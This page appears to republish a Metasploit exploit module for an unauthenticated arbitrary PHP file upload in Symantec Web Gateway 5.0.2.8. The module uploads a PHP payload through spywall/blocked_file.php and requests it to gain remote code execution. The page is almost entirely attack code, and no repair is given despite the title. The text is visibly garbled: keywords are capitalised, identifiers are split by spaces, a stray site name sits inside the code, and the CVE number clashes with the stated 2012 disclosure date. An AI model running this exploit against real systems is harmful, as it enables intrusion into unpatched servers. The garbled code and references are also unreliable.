Symantec Web Gateway 5.0.2.8 arbitrary PHP File Upload defects and repair

Source: Internet
Author: User
Tags php file upload


Require 'msf/core'
 

 
Class Metasploit3 <Msf: Exploit: Remote
 
Rank = ExcellentRanking
 

 
Include Msf: Exploit: Remote: HttpClient
 

 
Def initialize (info = {})
 
Super (update_info (info,
 
'Name' => "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability ",
 
'Description' => % q {
 
This module exploits a file upload vulnerability found in Symantec Web Gateway's
 
HTTP service. Due to the incorrect use of file extensions in the upload_file ()
 
Function, this allows us to abuse the spywall/blocked_file.php file in order
 
Upload a malicious PHP file without any authentication, which results in arbitrary
 
Code execution.
 
},
 
'License '=> MSF_LICENSE,
 
'Author' =>
 
[
 
'Tenable Network security', # Vulnerability Discovery
 
'Juan vazquez' # Metasploit module
 
],
 
'References '=>
 
[
 
['Cve', '2017-2012 '],
 
['Ossvdb', '123'],
 
['Bid', '123'],
 
['Url', 'HTTP: // www.zerodayinitiative.com/advisories/ZDI-12-091'],
 
['Url', 'HTTP: // www.deletec.com/security_response/securityupdates/detail.jsp? Fid = security_advisory & pvid = security_advisory & year = 2012 & suid = 20120517_00 ']
 
],
 
'Payload' =>
 
{
 
'Badchars' => "\ x00"
 
},
 
'Defaultopexception' =>
 
{
 
'Exitfunction' => "none"
 
},
 
'Platform' => ['php'],
 
'Arch '=> ARCH_PHP,
 
'Targets' =>
 
[
 
['Symantec Web Gateway 5.0.2.8 ', {}],
 
],
 
'Privileged' => false,
 
'Disclosuredate' => "May 17 2012 ",
 
'Defaulttarget' => 0 ))
 
End
 

 

 
Def check
 
Res = send_request_raw ({
 
'Method' => 'get ',
 
'Url' => '/spywall/login. php'
 
})
 

 
If res and res. body = ~ /\ <Title \> Symantec Web Gateway \ <\/title \>/
 
Return Exploit: CheckCode: Detected
 
Else
 
Return Exploit: CheckCode: Safe
 
End
 
End
 

 
Def on_new_session (client)
 
If client. type = "meterpreter"
 
Client. core. use ("stdapi") if not client. ext. aliases. include? ("Stdapi ")
 
Client. fs. file. rm ("temp. php ")
 
Else
 
Client. shell_command_token ("rm temp. php ")
 
End
 
End
 

 
Def exploit
 
Uri = target_uri.path
 
Uri <'/' if uri [-1, 1]! = '/'
 
Www.2cto.com
 
Peer = "# {rhost }:# {rport }"
 
Payload_name = Rex: Text. rand_text_alpha (rand (10) + 5) + '. php'
 
Before_filename = rand_text_alpha (rand (10) + 5)
 
After_filename = rand_text_alpha (rand (10) + 5)
 

 
Post_data = Rex: MIME: Message. new
 
Post_data.add_part ("true", nil, nil, "form-data; name = \" submitted \"")
 
Post_data.add_part (before_filename, "application/octet-stream", nil, "form-data; name = \" before_filename \"")
 
Post_data.add_part (after_filename, "application/octet-stream", nil, "form-data; name = \" after_filename \"")
 
Post_data.add_part ("<? Php # {payload. encoded}?> "," Image/gif ", nil," form-data; name = \ "new_image \"; filename = \ "# {payload_name }\"")
 

 
Print_status ("# {peer}-Sending PHP payload (# {payload_name })")
 
Res = send_request_cgi ({
 
'Method' => 'post ',
 
'Url' => "# {uri} spywall/blocked_file.php ",
 
'Ctype '=> "multipart/form-data; boundary =#{ post_data.bound }",
 
'Data' => post_data.to_s
 
})
 

 
# If the server returns 200 and the body contains the name
 
# Of the default file, we assume we uploaded the malicious
 
# File successfully
 
If not res or res. code! = 200 or res. body !~ /Temp. php/
 
Print_error ("# {peer}-File wasn't uploaded, aborting! ")
 
Return
 
End
 

 
Print_status ("# {peer}-Executing PHP payload (# {payload_name })")
 
# Execute our payload
 
Res = send_request_cgi ({
 
'Method' => 'get ',
 
'Url' => "# {uri} spywall/images/upload/temp. php"
 
})
 

 
# If we don't get a 200 when we request our malicious payload, we suspect
 
# We don't have a shell, either. Print the status code for debugging purposes.
 
If res and res. code! = 200
 
Print_status ("# {peer}-Server returned # {res. code. to_s }")
 
End
 
End
 

 
End

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.